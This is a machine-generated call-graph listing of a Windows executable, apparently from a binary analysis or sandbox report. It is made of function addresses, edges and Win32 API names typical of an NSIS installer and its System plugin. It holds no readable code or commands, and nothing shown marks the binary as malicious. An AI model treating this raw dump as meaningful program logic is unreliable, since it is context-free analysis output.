402371 4013->4017 4015 402b2c 17 API calls 4014->4015 4015->4017 4016 402381 4019 40238f 4016->4019 4020 402b2c 17 API calls 4016->4020 4017->4016 4018 402b2c 17 API calls 4017->4018 4018->4016 4023 402b2c 4019->4023 4020->4019 4024 402b38 4023->4024 4025 40600f 17 API calls 4024->4025 4026 402b59 4025->4026 4027 402398 WritePrivateProfileStringA 4026->4027 4028 406257 5 API calls 4026->4028 4028->4027 5140 401563 5141 401596 ShowWindow 5140->5141 5142 401567 5140->5142 5141->5142 5143 402965 5141->5143 5145 405f4b wsprintfA 5142->5145 5145->5143 5146 402765 5147 402b2c 17 API calls 5146->5147 5148 40276c FindFirstFileA 5147->5148 5149 40278f 5148->5149 5153 40277f 5148->5153 5154 405f4b wsprintfA 5149->5154 5151 402796 5155 405fed lstrcpynA 5151->5155 5154->5151 5155->5153 5156 4041e6 5157 4041fc 5156->5157 5164 404308 5156->5164 5160 40407b 18 API calls 5157->5160 5158 404377 5159 404441 5158->5159 5161 404381 GetDlgItem 5158->5161 5166 4040e2 8 API calls 5159->5166 5165 404252 5160->5165 5162 404397 5161->5162 5163 4043ff 5161->5163 5162->5163 5169 4043bd SendMessageA LoadCursorA SetCursor 5162->5169 5163->5159 5170 404411 5163->5170 5164->5158 5164->5159 5167 40434c GetDlgItem SendMessageA 5164->5167 5168 40407b 18 API calls 5165->5168 5180 40443c 5166->5180 5189 40409d KiUserCallbackDispatcher 5167->5189 5172 40425f CheckDlgButton 5168->5172 5193 40448a 5169->5193 5175 404417 SendMessageA 5170->5175 5176 404428 5170->5176 5187 40409d KiUserCallbackDispatcher 5172->5187 5175->5176 5176->5180 5181 40442e SendMessageA 5176->5181 5177 404372 5190 404466 5177->5190 5178 40427d GetDlgItem 5188 4040b0 SendMessageA 5178->5188 5181->5180 5184 404293 SendMessageA 5185 4042b1 GetSysColor 5184->5185 5186 4042ba SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5184->5186 5185->5186 5186->5180 5187->5178 5188->5184 5189->5177 5191 404474 5190->5191 5192 404479 SendMessageA 5190->5192 5191->5192 5192->5158 5196 4056cf ShellExecuteExA 5193->5196 5195 4043f0 LoadCursorA SetCursor 5195->5163 5196->5195 4586 4023e8 4587 40241a 4586->4587 4588 4023ef 4586->4588 4590 402b2c 17 API calls 4587->4590 4598 402b6c 4588->4598 4592 402421 4590->4592 4603 402bea 4592->4603 4593 402400 4595 402b2c 17 API calls 4593->4595 4596 402407 RegDeleteValueA RegCloseKey 4595->4596 4597 40242e 4596->4597 4599 402b2c 17 API calls 4598->4599 4600 402b83 4599->4600 4601 405e73 RegOpenKeyExA 4600->4601 4602 4023f6 4601->4602 4602->4593 4602->4597 4604 402bfd 4603->4604 4605 402bf6 4603->4605 4604->4605 4607 402c2e 4604->4607 4605->4597 4608 405e73 RegOpenKeyExA 4607->4608 4613 402c5c 4608->4613 4609 402c82 RegEnumKeyA 4610 402c99 RegCloseKey 4609->4610 4609->4613 4611 406385 5 API calls 4610->4611 4614 402ca9 4611->4614 4612 402cba RegCloseKey 4617 402cad 4612->4617 4613->4609 4613->4610 4613->4612 4615 402c2e 6 API calls 4613->4615 4613->4617 4616 402cca RegDeleteKeyA 4614->4616 4614->4617 4615->4613 4616->4617 4617->4605 4618 4025ea 4619 402603 4618->4619 4620 4025ef 4618->4620 4622 402b2c 17 API calls 4619->4622 4627 402b0a 4620->4627 4623 40260a lstrlenA 4622->4623 4624 4025f8 4623->4624 4625 405c2d WriteFile 4624->4625 4626 40262c 4624->4626 4625->4626 4628 40600f 17 API calls 4627->4628 4629 402b1f 4628->4629 4629->4624 4630 40206a 4631 40207c 4630->4631 4641 40212a 4630->4641 4632 402b2c 17 API calls 4631->4632 4634 402083 4632->4634 4633 401423 24 API calls 4636 4022a9 4633->4636 4635 402b2c 17 API calls 4634->4635 4637 40208c 4635->4637 4638 4020a1 LoadLibraryExA 4637->4638 4639 402094 GetModuleHandleA 4637->4639 4640 4020b1 GetProcAddress 4638->4640 4638->4641 4639->4638 4639->4640 4642 4020c0 4640->4642 4643 4020fd 4640->4643 4641->4633 4644 4020c8 4642->4644 4645 4020df 4642->4645 4646 405114 24 API calls 4643->4646 4693 401423 4644->4693 4651 700216db 4645->4651 4648 4020d0 4646->4648 4648->4636 4649 40211e FreeLibrary 4648->4649 4649->4636 4652 7002170b 4651->4652 4696 70021a98 4652->4696 4654 70021712 4655 70021834 4654->4655 4656 70021723 4654->4656 4657 7002172a 4654->4657 4655->4648 4744 700222af 4656->4744 4728 700222f1 4657->4728 4662 7002174f 4663 70021770 4662->4663 4664 7002178e 4662->4664 4757 700224d8 4663->4757 4669 70021794 4664->4669 4670 700217dc 4664->4670 4665 70021740 4668 70021746 4665->4668 4672 70021751 4665->4672 4666 70021759 4666->4662 4754 70022cc3 4666->4754 4668->4662 4738 70022a38 4668->4738 4776 7002156b 4669->4776 4676 700224d8 11 API calls 4670->4676 4671 70021776 4768 70021559 4671->4768 4748 700226b2 4672->4748 4680 700217cd 4676->4680 4684 70021823 4680->4684 4782 7002249e 4680->4782 4682 70021757 4682->4662 4683 700224d8 11 API calls 4683->4680 4684->4655 4688 7002182d GlobalFree 4684->4688 4688->4655 4690 7002180f 4690->4684 4786 700214e2 wsprintfA 4690->4786 4691 70021808 FreeLibrary 4691->4690 4694 405114 24 API calls 4693->4694 4695 401431 4694->4695 4695->4648 4789 70021215 GlobalAlloc 4696->4789 4698 70021abf 4790 70021215 GlobalAlloc 4698->4790 4700 70021d00 GlobalFree GlobalFree GlobalFree 4701 70021d1d 4700->4701 4713 70021d67 4700->4713 4703 700220f1 4701->4703 4711 70021d32 4701->4711 4701->4713 4702 70021bbd GlobalAlloc 4722 70021aca 4702->4722 4704 70022113 GetModuleHandleA 4703->4704 4703->4713 4707 70022124 LoadLibraryA 4704->4707 4708 70022139 4704->4708 4705 70021c08 lstrcpyA 4710 70021c12 lstrcpyA 4705->4710 4706 70021c26 GlobalFree 4706->4722 4707->4708 4707->4713 4797 700215c2 GetProcAddress 4708->4797 4710->4722 4711->4713 4793 70021224 4711->4793 4712 70022033 4712->4713 4725 7002208c lstrcpyA 4712->4725 4713->4654 4714 7002218a 4714->4713 4719 70022197 lstrlenA 4714->4719 4715 70021fb7 4796 70021215 GlobalAlloc 4715->4796 4717 7002214b 4717->4714 4726 70022174 GetProcAddress 4717->4726 4798 700215c2 GetProcAddress 4719->4798 4720 70021ef9 GlobalFree 4720->4722 4722->4700 4722->4702 4722->4705 4722->4706 4722->4710 4722->4712 4722->4713 4722->4715 4722->4720 4723 70021224 2 API calls 4722->4723 4791 70021534 GlobalSize GlobalAlloc 4722->4791 4723->4722 4725->4713 4726->4714 4727 70021fbf 4727->4654 4729 7002230a 4728->4729 4731 70022446 GlobalFree 4729->4731 4732 700223b8 GlobalAlloc MultiByteToWideChar 4729->4732 4735 70021224 GlobalAlloc lstrcpynA 4729->4735 4737 70022405 4729->4737 4800 700212ad 4729->4800 4731->4729 4733 70021730 4731->4733 4734 700223e4 GlobalAlloc CLSIDFromString GlobalFree 4732->4734 4732->4737 4733->4662 4733->4665 4733->4666 4734->4731 4735->4729 4737->4731 4804 70022646 4737->4804 4739 70022a4a 4738->4739 4740 70022aef VirtualAlloc 4739->4740 4743 70022b0d 4740->4743 4742 70022bd9 4742->4662 4807 700229e4 4743->4807 4745 700222c4 4744->4745 4746 700222cf GlobalAlloc 4745->4746 4747 70021729 4745->4747 4746->4745 4747->4657 4752 700226e2 4748->4752 4749 70022790 4751 70022796 GlobalSize 4749->4751 4753 700227a0 4749->4753 4750 7002277d GlobalAlloc 4750->4753 4751->4753 4752->4749 4752->4750 4753->4682 4755 70022cce 4754->4755 4756 70022d0e GlobalFree 4755->4756 4811 70021215 GlobalAlloc 4757->4811 4759 70022563 lstrcpynA 4765 700224e4 4759->4765 4760 70022574 StringFromGUID2 WideCharToMultiByte 4760->4765 4761 70022598 WideCharToMultiByte 4761->4765 4762 700225b9 wsprintfA 4762->4765 4763 700225dd GlobalFree 4763->4765 4764 70022617 GlobalFree 4764->4671 4765->4759 4765->4760 4765->4761 4765->4762 4765->4763 4765->4764 4766 70021266 2 API calls 4765->4766 4812 700212d1 4765->4812 4766->4765 4816 70021215 GlobalAlloc 4768->4816 4770 7002155e 4771 7002156b 2 API calls 4770->4771 4772 70021568 4771->4772 4773 70021266 4772->4773 4774 700212a8 GlobalFree 4773->4774 4775 7002126f GlobalAlloc lstrcpynA 4773->4775 4774->4680 4775->4774 4777 700215a4 lstrcpyA 4776->4777 4778 70021577 wsprintfA 4776->4778 4781 700215bd 4777->4781 4778->4781 4781->4683 4783 700217ef 4782->4783 4784 700224ac 4782->4784 4783->4690 4783->4691 4784->4783 4785 700224c5 GlobalFree 4784->4785 4785->4784 4787 70021266 2 API calls 4786->4787 4788 70021503 4787->4788 4788->4684 4789->4698 4790->4722 4792 70021552 4791->4792 4792->4722 4799 70021215 GlobalAlloc 4793->4799 4795 70021233 lstrcpynA 4795->4713 4796->4727 4797->4717 4798->4713 4799->4795 4801 700212b4 4800->4801 4802 70021224 2 API calls 4801->4802 4803 700212cf 4802->4803 4803->4729 4805 70022654 VirtualAlloc 4804->4805 4806 700226aa 4804->4806 4805->4806 4806->4737 4808 700229ef 4807->4808 4809 700229f4 GetLastError 4808->4809 4810 700229ff 4808->4810 4809->4810 4810->4742 4811->4765 4813 700212da 4812->4813 4814 700212f9 4812->4814 4813->4814 4815 700212e0 lstrcpyA 4813->4815 4814->4765 4815->4814 4816->4770 4817 40166a 4818 402b2c 17 API calls 4817->4818 4819 401671 4818->4819 4820 402b2c 17 API calls 4819->4820 4821 40167a 4820->4821 4822 402b2c 17 API calls 4821->4822 4823 401683 MoveFileA 4822->4823 4824 401696 4823->4824 4825 40168f 4823->4825 4827 4062f0 2 API calls 4824->4827 4829 4022a9 4824->4829 4826 401423 24 API calls 4825->4826 4826->4829 4828 4016a5 4827->4828 4828->4829 4830 405dcc 36 API calls 4828->4830 4830->4825 5197 4019ed 5198 402b2c 17 API calls 5197->5198 5199 4019f4 5198->5199 5200 402b2c 17 API calls 5199->5200 5201 4019fd 5200->5201 5202 401a04 lstrcmpiA 5201->5202 5203 401a16 lstrcmpA 5201->5203 5204 401a0a 5202->5204 5203->5204 4843 4026ef 4844 4026f6 4843->4844 4847 402965 4843->4847 4845 402b0a 17 API calls 4844->4845 4846 4026fd 4845->4846 4848 40270c SetFilePointer 4846->4848 4848->4847 4849 40271c 4848->4849 4851 405f4b wsprintfA 4849->4851 4851->4847 4852 40156f 4853 40157f ShowWindow 4852->4853 4854 401586 4852->4854 4853->4854 4855 402965 4854->4855 4856 401596 ShowWindow 4854->4856 4856->4855 4857 402960 4856->4857 4859 405f4b wsprintfA 4857->4859 4859->4855 5205 4014f4 SetForegroundWindow 5206 4029b8 5205->5206 5207 70021837 5208 7002185a 5207->5208 5209 7002188a GlobalFree 5208->5209 5210 7002189c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5208->5210 5209->5210 5211 70021266 2 API calls 5210->5211 5212 70021a1e GlobalFree GlobalFree 5211->5212 5213 70021638 5214 70021667 5213->5214 5215 70021a98 18 API calls 5214->5215 5216 7002166e 5215->5216 5217 70021681 5216->5217 5218 70021675 5216->5218 5220 7002168b 5217->5220 5221 700216a8 5217->5221 5219 70021266 2 API calls 5218->5219 5229 7002167f 5219->5229 5222 700214e2 3 API calls 5220->5222 5223 700216d2 5221->5223 5224 700216ae 5221->5224 5227 70021690 5222->5227 5226 700214e2 3 API calls 5223->5226 5225 70021559 3 API calls 5224->5225 5228 700216b3 5225->5228 5226->5229 5230 70021559 3 API calls 5227->5230 5231 70021266 2 API calls 5228->5231 5232 70021696 5230->5232 5233 700216b9 GlobalFree 5231->5233 5234 70021266 2 API calls 5232->5234 5233->5229 5235 700216cd GlobalFree 5233->5235 5236 7002169c GlobalFree 5234->5236 5235->5229 5236->5229 5237 401cfb 5238 402b0a 17 API calls 5237->5238 5239 401d02 5238->5239 5240 402b0a 17 API calls 5239->5240 5241 401d0e GetDlgItem 5240->5241 5242 4025e4 5241->5242 5243 4018fd 5244 401934 5243->5244 5245 402b2c 17 API calls 5244->5245 5246 401939 5245->5246 5247 4057b5 67 API calls 5246->5247 5248 401942 5247->5248 5249 7002103d 5250 7002101b 5 API calls 5249->5250 5251 70021056 5250->5251 5252 401dff GetDC 5253 402b0a 17 API calls 5252->5253 5254 401e11 GetDeviceCaps MulDiv ReleaseDC 5253->5254 5255 402b0a 17 API calls 5254->5255 5256 401e42 5255->5256 5257 40600f 17 API calls 5256->5257 5258 401e7f CreateFontIndirectA 5257->5258 5259 4025e4 5258->5259 5260 401000 5261 401037 BeginPaint GetClientRect 5260->5261 5262 40100c DefWindowProcA 5260->5262 5264 4010f3 5261->5264 5265 401179 5262->5265 5266 401073 CreateBrushIndirect FillRect DeleteObject 5264->5266 5267 4010fc 5264->5267 5266->5264 5268 401102 CreateFontIndirectA 5267->5268 5269 401167 EndPaint 5267->5269 5268->5269 5270 401112 6 API calls 5268->5270 5269->5265 5270->5269 5271 404a80 GetDlgItem GetDlgItem 5272 404ad6 7 API calls 5271->5272 5277 404cfd 5271->5277 5273 404b72 SendMessageA 5272->5273 5274 404b7e DeleteObject 5272->5274 5273->5274 5275 404b89 5274->5275 5276 404bc0 5275->5276 5278 40600f 17 API calls 5275->5278 5279 40407b 18 API calls 5276->5279 5284 404ddf 5277->5284 5305 404d6c 5277->5305 5324 4049ce SendMessageA 5277->5324 5282 404ba2 SendMessageA SendMessageA 5278->5282 5283 404bd4 5279->5283 5280 404e8b 5281 404e95 SendMessageA 5280->5281 5288 404e9d 5280->5288 5281->5288 5282->5275 5290 40407b 18 API calls 5283->5290 5284->5280 5285 404e38 SendMessageA 5284->5285 5314 404cf0 5284->5314 5292 404e4d SendMessageA 5285->5292 5285->5314 5286 4040e2 8 API calls 5293 405081 5286->5293 5287 404dd1 SendMessageA 5287->5284 5294 404eb6 5288->5294 5295 404eaf ImageList_Destroy 5288->5295 5299 404ec6 5288->5299 5302 404be5 5290->5302 5291 405035 5300 405047 ShowWindow GetDlgItem ShowWindow 5291->5300 5291->5314 5297 404e60 5292->5297 5298 404ebf GlobalFree 5294->5298 5294->5299 5295->5294 5296 404cbf GetWindowLongA SetWindowLongA 5301 404cd8 5296->5301 5307 404e71 SendMessageA 5297->5307 5298->5299 5299->5291 5317 404f01 5299->5317 5329 404a4e 5299->5329 5300->5314 5303 404cf5 5301->5303 5304 404cdd ShowWindow 5301->5304 5302->5296 5306 404c37 SendMessageA 5302->5306 5308 404cba 5302->5308 5311 404c75 SendMessageA 5302->5311 5312 404c89 SendMessageA 5302->5312 5323 4040b0 SendMessageA 5303->5323 5322 4040b0 SendMessageA 5304->5322 5305->5284 5305->5287 5306->5302 5307->5280 5308->5296 5308->5301 5311->5302 5312->5302 5314->5286 5315 40500b InvalidateRect 5315->5291 5316 405021 5315->5316 5338 404989 5316->5338 5318 404f2f SendMessageA 5317->5318 5321 404f45 5317->5321 5318->5321 5320 404fb9 SendMessageA SendMessageA 5320->5321 5321->5315 5321->5320 5322->5314 5323->5277 5325 4049f1 GetMessagePos ScreenToClient SendMessageA 5324->5325 5326 404a2d SendMessageA 5324->5326 5327 404a25 5325->5327 5328 404a2a 5325->5328 5326->5327 5327->5305 5328->5326 5341 405fed lstrcpynA 5329->5341 5331 404a61 5342 405f4b wsprintfA 5331->5342 5333 404a6b 5334 40140b 2 API calls 5333->5334 5335 404a74 5334->5335 5343 405fed lstrcpynA 5335->5343 5337 404a7b 5337->5317 5344 4048c4 5338->5344 5340 40499e 5340->5291 5341->5331 5342->5333 5343->5337 5345 4048da 5344->5345 5346 40600f 17 API calls 5345->5346 5347 40493e 5346->5347 5348 40600f 17 API calls 5347->5348 5349 404949 5348->5349 5350 40600f 17 API calls 5349->5350 5351 40495f lstrlenA wsprintfA SetDlgItemTextA 5350->5351 5351->5340 5352 401900 5353 402b2c 17 API calls 5352->5353 5354 401907 5353->5354 5355 405709 MessageBoxIndirectA 5354->5355 5356 401910 5355->5356 5357 401502 5358 40150a 5357->5358 5360 40151d 5357->5360 5359 402b0a 17 API calls 5358->5359 5359->5360 5361 405088 5362 405098 5361->5362 5363 4050ac 5361->5363 5364 4050f5 5362->5364 5365 40509e 5362->5365 5366 4050b4 IsWindowVisible 5363->5366 5372 4050cb 5363->5372 5367 4050fa CallWindowProcA 5364->5367 5368 4040c7 SendMessageA 5365->5368 5366->5364 5369 4050c1 5366->5369 5371 4050a8 5367->5371 5368->5371 5370 4049ce 5 API calls 5369->5370 5370->5372 5372->5367 5373 404a4e 4 API calls 5372->5373 5373->5364 5374 401c0a 5375 402b0a 17 API calls 5374->5375 5376 401c11 5375->5376 5377 402b0a 17 API calls 5376->5377 5379 401c1e 5377->5379 5378 401c33 5381 401c43 5378->5381 5382 402b2c 17 API calls 5378->5382 5379->5378 5380 402b2c 17 API calls 5379->5380 5380->5378 5383 401c9a 5381->5383 5384 401c4e 5381->5384 5382->5381 5385 402b2c 17 API calls 5383->5385 5386 402b0a 17 API calls 5384->5386 5387 401c9f 5385->5387 5388 401c53 5386->5388 5389 402b2c 17 API calls 5387->5389 5390 402b0a 17 API calls 5388->5390 5391 401ca8 FindWindowExA 5389->5391 5392 401c5f 5390->5392 5395 401cc6 5391->5395 5393 401c8a SendMessageA 5392->5393 5394 401c6c SendMessageTimeoutA 5392->5394 5393->5395 5394->5395 5396 40450d 5397 404539 5396->5397 5398 40454a 5396->5398 5457 4056ed GetDlgItemTextA 5397->5457 5399 404556 GetDlgItem 5398->5399 5407 4045b5 5398->5407 5401 40456a 5399->5401 5405 40457e SetWindowTextA 5401->5405 5410 405a1e 4 API calls 5401->5410 5402 404699 5406 404843 5402->5406 5459 4056ed GetDlgItemTextA 5402->5459 5403 404544 5404 406257 5 API calls 5403->5404 5404->5398 5411 40407b 18 API calls 5405->5411 5409 4040e2 8 API calls 5406->5409 5407->5402 5407->5406 5412 40600f 17 API calls 5407->5412 5414 404857 5409->5414 5415 404574 5410->5415 5416 40459a 5411->5416 5417 404629 SHBrowseForFolderA 5412->5417 5413 4046c9 5418 405a73 18 API calls 5413->5418 5415->5405 5422 405985 3 API calls 5415->5422 5419 40407b 18 API calls 5416->5419 5417->5402 5420 404641 CoTaskMemFree 5417->5420 5421 4046cf 5418->5421 5423 4045a8 5419->5423 5424 405985 3 API calls 5420->5424 5460 405fed lstrcpynA 5421->5460 5422->5405 5458 4040b0 SendMessageA 5423->5458 5426 40464e 5424->5426 5430 404685 SetDlgItemTextA 5426->5430 5433 40600f 17 API calls 5426->5433 5428 4046e6 5432 406385 5 API calls 5428->5432 5429 4045ae 5431 406385 5 API calls 5429->5431 5430->5402 5431->5407 5439 4046ed 5432->5439 5434 40466d lstrcmpiA 5433->5434 5434->5430 5436 40467e lstrcatA 5434->5436 5435 404729 5461 405fed lstrcpynA 5435->5461 5436->5430 5438 404730 5440 405a1e 4 API calls 5438->5440 5439->5435 5444 4059cc 2 API calls 5439->5444 5445 404781 5439->5445 5441 404736 GetDiskFreeSpaceA 5440->5441 5443 40475a MulDiv 5441->5443 5441->5445 5443->5445 5444->5439 5446 4047f2 5445->5446 5448 404989 20 API calls 5445->5448 5447 404815 5446->5447 5450 40140b 2 API calls 5446->5450 5462 40409d KiUserCallbackDispatcher 5447->5462 5449 4047df 5448->5449 5451 4047f4 SetDlgItemTextA 5449->5451 5452 4047e4 5449->5452 5450->5447 5451->5446 5454 4048c4 20 API calls 5452->5454 5454->5446 5455 404831 5455->5406 5456 404466 SendMessageA 5455->5456 5456->5406 5457->5403 5458->5429 5459->5413 5460->5428 5461->5438 5462->5455 4860 401e8f 4861 402b0a 17 API calls 4860->4861 4862 401e95 4861->4862 4863 402b0a 17 API calls 4862->4863 4864 401ea1 4863->4864 4865 401eb8 EnableWindow 4864->4865 4866 401ead ShowWindow 4864->4866 4867 4029b8 4865->4867 4866->4867 5463 401490 5464 405114 24 API calls 5463->5464 5465 401497 5464->5465 5466 402993 SendMessageA 5467 4029b8 5466->5467 5468 4029ad InvalidateRect 5466->5468 5468->5467 5469 700215d1 5470 700214bb GlobalFree 5469->5470 5472 700215e9 5470->5472 5471 7002162f GlobalFree 5472->5471 5473 70021604 5472->5473 5474 7002161b VirtualFree 5472->5474 5473->5471 5474->5471 5475 7002225a 5476 700222c4 5475->5476 5477 700222cf GlobalAlloc 5476->5477 5478 700222ee 5476->5478 5477->5476 5479 401f98 5480 402b2c 17 API calls 5479->5480 5481 401f9f 5480->5481 5482 4062f0 2 API calls 5481->5482 5483 401fa5 5482->5483 5485 401fb7 5483->5485 5486 405f4b wsprintfA 5483->5486 5486->5485 5487 70021058 5489 70021074 5487->5489 5488 700210dc 5489->5488 5490 700214bb GlobalFree 5489->5490 5491 70021091 5489->5491 5490->5491 5492 700214bb GlobalFree 5491->5492 5493 700210a1 5492->5493 5494 700210b1 5493->5494 5495 700210a8 GlobalSize 5493->5495 5496 700210c6 5494->5496 5497 700210b5 GlobalAlloc 5494->5497 5495->5494 5499 700210d1 GlobalFree 5496->5499 5498 700214e2 3 API calls 5497->5498 5498->5496 5499->5488 5500 40149d 5501 4014ab PostQuitMessage 5500->5501 5502 40234e 5500->5502 5501->5502 5503 40159d 5504 402b2c 17 API calls 5503->5504 5505 4015a4 SetFileAttributesA 5504->5505 5506 4015b6 5505->5506 5507 401a1e 5508 402b2c 17 API calls 5507->5508 5509 401a27 ExpandEnvironmentStringsA 5508->5509 5510 401a3b 5509->5510 5512 401a4e 5509->5512 5511 401a40 lstrcmpA 5510->5511 5510->5512 5511->5512 5518 40289e 5519 402b0a 17 API calls 5518->5519 5520 4028a4 5519->5520 5521 4028e3 5520->5521 5522 4028cc 5520->5522 5528 402783 5520->5528 5523 4028fd 5521->5523 5524 4028ed 5521->5524 5525 4028d1 5522->5525 5529 4028e0 5522->5529 5527 40600f 17 API calls 5523->5527 5526 402b0a 17 API calls 5524->5526 5532 405fed lstrcpynA 5525->5532 5526->5529 5527->5529 5529->5528 5533 405f4b wsprintfA 5529->5533 5532->5528 5533->5528 5534 40171f 5535 402b2c 17 API calls 5534->5535 5536 401726 SearchPathA 5535->5536 5537 401741 5536->5537 5538 401d20 5539 402b0a 17 API calls 5538->5539 5540 401d2e SetWindowLongA 5539->5540 5541 4029b8 5540->5541 5542 402721 5543 402727 5542->5543 5544 4029b8 5543->5544 5545 40272f FindClose 5543->5545 5545->5544 5546 70022be3 5547 70022bfb 5546->5547 5548 70021534 2 API calls 5547->5548 5549 70022c16 5548->5549 5550 700210e0 5559 7002110e 5550->5559 5551 700211c4 GlobalFree 5552 700212ad 2 API calls 5552->5559 5553 700211c3 5553->5551 5554 70021155 GlobalAlloc 5554->5559 5555 700211ea GlobalFree 5555->5559 5556 70021266 2 API calls 5558 700211b1 GlobalFree 5556->5558 5557 700212d1 lstrcpyA 5557->5559 5558->5559 5559->5551 5559->5552 5559->5553 5559->5554 5559->5555 5559->5556 5559->5557 5559->5558 5560 4027a3 5561 402b2c 17 API calls 5560->5561 5562 4027b1 5561->5562 5563 4027c7 5562->5563 5564 402b2c 17 API calls 5562->5564 5565 405b61 2 API calls 5563->5565 5564->5563 5566 4027cd 5565->5566 5588 405b86 GetFileAttributesA CreateFileA 5566->5588 5568 4027da 5569 4027e6 GlobalAlloc 5568->5569 5570 40287d 5568->5570 5571 402874 CloseHandle 5569->5571 5572 4027ff 5569->5572 5573 402885 DeleteFileA 5570->5573 5574 402898 5570->5574 5571->5570 5589 403200 SetFilePointer 5572->5589 5573->5574 5576 402805 5577 4031ea ReadFile 5576->5577 5578 40280e GlobalAlloc 5577->5578 5579 402852 5578->5579 5580 40281e 5578->5580 5581 405c2d WriteFile 5579->5581 5582 402ffb 31 API calls 5580->5582 5583 40285e GlobalFree 5581->5583 5584 40282b 5582->5584 5585 402ffb 31 API calls 5583->5585 5586 402849 GlobalFree 5584->5586 5587 402871 5585->5587 5586->5579 5587->5571 5588->5568 5589->5576 4039 403ba7 4040 403cfa 4039->4040 4041 403bbf 4039->4041 4043 403d0b GetDlgItem GetDlgItem 4040->4043 4048 403d4b 4040->4048 4041->4040 4042 403bcb 4041->4042 4045 403bd6 SetWindowPos 4042->4045 4046 403be9 4042->4046 4047 40407b 18 API calls 4043->4047 4044 403da5 4057 403cf5 4044->4057 4110 4040c7 4044->4110 4045->4046 4050 403c06 4046->4050 4051 403bee ShowWindow 4046->4051 4052 403d35 SetClassLongA 4047->4052 4048->4044 4053 401389 2 API calls 4048->4053 4054 403c28 4050->4054 4055 403c0e DestroyWindow 4050->4055 4051->4050 4056 40140b 2 API calls 4052->4056 4061 403d7d 4053->4061 4059 403c2d SetWindowLongA 4054->4059 4060 403c3e 4054->4060 4058 404004 4055->4058 4056->4048 4058->4057 4070 404035 ShowWindow 4058->4070 4059->4057 4062 403ce7 4060->4062 4063 403c4a GetDlgItem 4060->4063 4061->4044 4064 403d81 SendMessageA 4061->4064 4132 4040e2 4062->4132 4067 403c7a 4063->4067 4068 403c5d SendMessageA IsWindowEnabled 4063->4068 4064->4057 4065 40140b 2 API calls 4078 403db7 4065->4078 4066 404006 DestroyWindow EndDialog 4066->4058 4072 403c87 4067->4072 4075 403cce SendMessageA 4067->4075 4076 403c9a 4067->4076 4084 403c7f 4067->4084 4068->4057 4068->4067 4070->4057 4071 40600f 17 API calls 4071->4078 4072->4075 4072->4084 4074 40407b 18 API calls 4074->4078 4075->4062 4079 403ca2 4076->4079 4080 403cb7 4076->4080 4077 403cb5 4077->4062 4078->4057 4078->4065 4078->4066 4078->4071 4078->4074 4101 403f46 DestroyWindow 4078->4101 4113 40407b 4078->4113 4126 40140b 4079->4126 4081 40140b 2 API calls 4080->4081 4083 403cbe 4081->4083 4083->4062 4083->4084 4129 404054 4084->4129 4086 403e32 GetDlgItem 4087 403e47 4086->4087 4088 403e4f ShowWindow KiUserCallbackDispatcher 4086->4088 4087->4088 4116 40409d KiUserCallbackDispatcher 4088->4116 4090 403e79 EnableWindow 4095 403e8d 4090->4095 4091 403e92 GetSystemMenu EnableMenuItem SendMessageA 4092 403ec2 SendMessageA 4091->4092 4091->4095 4092->4095 4095->4091 4117 4040b0 SendMessageA 4095->4117 4118 403b88 4095->4118 4121 405fed lstrcpynA 4095->4121 4097 403ef1 lstrlenA 4098 40600f 17 API calls 4097->4098 4099 403f02 SetWindowTextA 4098->4099 4122 401389 4099->4122 4101->4058 4102 403f60 CreateDialogParamA 4101->4102 4102->4058 4103 403f93 4102->4103 4104 40407b 18 API calls 4103->4104 4105 403f9e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4104->4105 4106 401389 2 API calls 4105->4106 4107 403fe4 4106->4107 4107->4057 4108 403fec ShowWindow 4107->4108 4109 4040c7 SendMessageA 4108->4109 4109->4058 4111 4040d0 SendMessageA 4110->4111 4112 4040df 4110->4112 4111->4112 4112->4078 4114 40600f 17 API calls 4113->4114 4115 404086 SetDlgItemTextA 4114->4115 4115->4086 4116->4090 4117->4095 4119 40600f 17 API calls 4118->4119 4120 403b96 SetWindowTextA 4119->4120 4120->4095 4121->4097 4124 401390 4122->4124 4123 4013fe 4123->4078 4124->4123 4125 4013cb MulDiv SendMessageA 4124->4125 4125->4124 4127 401389 2 API calls 4126->4127 4128 401420 4127->4128 4128->4084 4130 404061 SendMessageA 4129->4130 4131 40405b 4129->4131 4130->4077 4131->4130 4133 4041a5 4132->4133 4134 4040fa GetWindowLongA 4132->4134 4133->4057 4134->4133 4135 40410f 4134->4135 4135->4133 4136 40413c GetSysColor 4135->4136 4137 40413f 4135->4137 4136->4137 4138 404145 SetTextColor 4137->4138 4139 40414f SetBkMode 4137->4139 4138->4139 4140 404167 GetSysColor 4139->4140 4141 40416d 4139->4141 4140->4141 4142 404174 SetBkColor 4141->4142 4143 40417e 4141->4143 4142->4143 4143->4133 4144 404191 DeleteObject 4143->4144 4145 404198 CreateBrushIndirect 4143->4145 4144->4145 4145->4133 5590 4023a7 5591 402b2c 17 API calls 5590->5591 5592 4023b8 5591->5592 5593 402b2c 17 API calls 5592->5593 5594 4023c1 5593->5594 5595 402b2c 17 API calls 5594->5595 5596 4023cb GetPrivateProfileStringA 5595->5596 5597 40292c 5598 402b0a 17 API calls 5597->5598 5599 402932 5598->5599 5600 402967 5599->5600 5601 402783 5599->5601 5603 402944 5599->5603 5600->5601 5602 40600f 17 API calls 5600->5602 5602->5601 5603->5601 5605 405f4b wsprintfA 5603->5605 5605->5601 4868 402631 4869 402b0a 17 API calls 4868->4869 4872 40263b 4869->4872 4870 4026a9 4871 405bfe ReadFile 4871->4872 4872->4870 4872->4871 4873 4026ab 4872->4873 4874 4026bb 4872->4874 4877 405f4b wsprintfA 4873->4877 4874->4870 4876 4026d1 SetFilePointer 4874->4876 4876->4870 4877->4870 5606 4041b1 lstrcpynA lstrlenA 5607 4022b2 5608 402b2c 17 API calls 5607->5608 5609 4022b8 5608->5609 5610 402b2c 17 API calls 5609->5610 5611 4022c1 5610->5611 5612 402b2c 17 API calls 5611->5612 5613 4022ca 5612->5613 5614 4062f0 2 API calls 5613->5614 5615 4022d3 5614->5615 5616 4022e4 lstrlenA lstrlenA 5615->5616 5620 4022d7 5615->5620 5618 405114 24 API calls 5616->5618 5617 405114 24 API calls 5621 4022df 5617->5621 5619 402320 SHFileOperationA 5618->5619 5619->5620 5619->5621 5620->5617 5620->5621 5622 402334 5623 40234e 5622->5623 5624 40233b 5622->5624 5625 40600f 17 API calls 5624->5625 5626 402348 5625->5626 5626->5623 5627 405709 MessageBoxIndirectA 5626->5627 5627->5623 5628 4014b7 5629 4014bd 5628->5629 5630 401389 2 API calls 5629->5630 5631 4014c5 